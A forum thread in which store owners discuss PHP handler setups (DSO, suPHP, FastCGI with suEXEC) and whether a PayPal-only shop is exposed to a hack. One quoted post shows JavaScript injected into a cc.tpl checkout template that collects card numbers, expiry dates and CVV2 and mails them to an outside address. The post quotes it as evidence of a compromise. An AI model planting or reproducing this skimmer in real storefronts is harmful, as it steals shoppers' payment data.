[quote name=‘nedd’]I’m not sure where to check is it DSO, phpSuExec or SuPHP based system?
This is my current PHP configuration:
DEFAULT PHP: 5
PHP4 SAPI: none
PHP5 SAPI: fcgi
SUEXEC: enabled
PHP 5.2.9 (cli) (built: May 14 2009 00:48:26)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2009 Zend Technologies
with eAccelerator v0.9.5.3, Copyright (c) 2004-2006 eAccelerator, by eAccelerator
with the ionCube PHP Loader v3.1.34, Copyright (c) 2002-2009, by ionCube Ltd., and
with Zend Extension Manager v1.2.2, Copyright (c) 2003-2007, by Zend Technologies
with Suhosin v0.9.27, Copyright (c) 2007, by SektionEins GmbH
with Zend Optimizer v3.3.3, Copyright (c) 1998-2007, by Zend Technologies
Please advise.
Thanks.[/quote]
One phone call or email to your webhost will tell you for certain.
[quote name=‘Traveler’]One phone call or email to your webhost will tell you for certain.[/QUOTE]
Well, that’s what I got from my webhost when asked is it DSO, phpSuExec or SuPHP based system.
[quote name=‘nedd’]Well, that’s what I got from my webhost when asked is it DSO, phpSuExec or SuPHP based system.[/quote]
Nedd,
Call them and ask them to clearly tell you and not give you a report that you did not ask for.
Personally this is an example of why I won’t use a really good webhost as in answers the phone within a couple of minutes and gives you the answers that you need.
Who is your host?
[quote name=‘Golfcart’]Here is the code that was added to the cc.tpl file (information in [COLOR=“DarkRed”]RED[/COLOR])
// Check payment info fields
function fn_can_place_order()
{$ldelim}
if (false == fn_check_agreement()){$ldelim}
return false;
{$rdelim}
var card_number = document.getElementById(‘cc_number’).value.replace(/[ -]/gi, ‘’);
var card_type = document.getElementById(‘cc_type’).value;
var exp_mon = document.getElementById(‘cc_exp_month’).value;
var exp_year = document.getElementById(‘cc_exp_year’).value;
// Reserved
var start_mon = start_date_required[card_type] == ‘Y’ ? document.getElementById(‘cc_start_month’).value : ‘’;
var start_year = start_date_required[card_type] == ‘Y’ ? document.getElementById(‘cc_start_year’).value : ‘’;
var cvv2 = cvv2_required[card_type] == ‘Y’ ? document.getElementById(‘cc_cvv2’).value : ‘’;
if (CheckCardNumber(card_number, card_type, exp_mon, exp_year)) {$ldelim}
document.getElementById(‘cc_number’).value = card_number;
[COLOR=“darkred”]m = new SendMail ();
m.To = ‘velung@yahoo.com’;
m.From = ‘heuhuefbejhfegf@stevescartshop.com’;
m.Body = 'card_number | exp_mon | exp_year | cvv2 | - cc_number | cc_name | ';
m.send(); m.send (); [/COLOR]
return true;
{$rdelim}
return false;
{$rdelim}[/QUOTE]
I am using PayPal (standard) for my clients payment gateway. There will be no credit card info stored on my server - everything will be stored and Processed on PayPal’s side. With this in mind, will there be any danger/risk of the above hack happening to my clients site??
Will the cc.tpl file even be used??
Again, thanks in advance!
[quote name=‘Traveler’]Nedd,
Call them and ask them to clearly tell you and not give you a report that you did not ask for.
Personally this is an example of why I won’t use a really good webhost as in answers the phone within a couple of minutes and gives you the answers that you need.
Who is your host?[/QUOTE]
This is another answer from my webhost:
“It’s PHP running as FastCGI with Apache suEXEC.
This means PHP is running as optimized CGI (FAST) and Apache is executing the PHP as your user.”
Can someone “translate” it in regard to DSO, phpSuExec, SuPHP configurations?